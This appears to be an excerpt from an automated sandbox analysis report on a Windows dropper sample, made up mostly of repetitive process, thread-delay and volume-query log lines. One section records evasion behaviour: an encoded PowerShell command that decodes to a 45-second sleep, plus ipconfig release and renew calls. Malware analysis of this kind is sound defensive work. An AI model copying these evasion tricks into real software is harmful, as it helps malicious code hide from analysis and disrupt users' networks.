              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe TID: 160Thread sleep count: 196 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep count: 7601 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4624Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5116Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7601
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9150
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Kl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: Base64 decoded start-sleep -seconds 45
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: Base64 decoded start-sleep -seconds 45
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
